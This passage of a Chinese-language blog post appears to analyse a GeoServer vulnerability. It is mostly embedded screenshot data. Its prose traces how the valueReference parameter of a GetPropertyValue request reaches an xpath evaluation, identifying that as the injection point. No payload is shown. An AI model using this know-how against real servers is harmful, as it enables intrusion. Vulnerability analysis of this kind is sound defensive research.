<p blockindex=26><img src=data:image/png;base64,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
<p blockindex=27>发现断点在<code>org.geotools.data.complex.expression.FeaturePropertyAccessorFactory.FeaturePropertyAccessor.get()</code>方法上此时的xpath参数的值正是<code>valueReference</code>的值,说明这里是注入点</p>
<p blockindex=28>根据调用栈,往前看,从<code>org.geoserver.wfs.GetPropertyValue</code>的run方法开始</p>
<p blockindex=29><img src="data:image/png;base64,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
<p blockindex=30>run方法获取请求对象然后就是各种解析其中发现这里会把valueReference的值进行一个正则匹配将[]中的内容和[]替换为空</p>
<p blockindex=31>跟进evaluate()方法查看</p>
<p blockindex=32><img src=data:image/png;base64,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
<p blockindex=33>继续跟进</p>
<p blockindex=34><img src="data:image/png;base64,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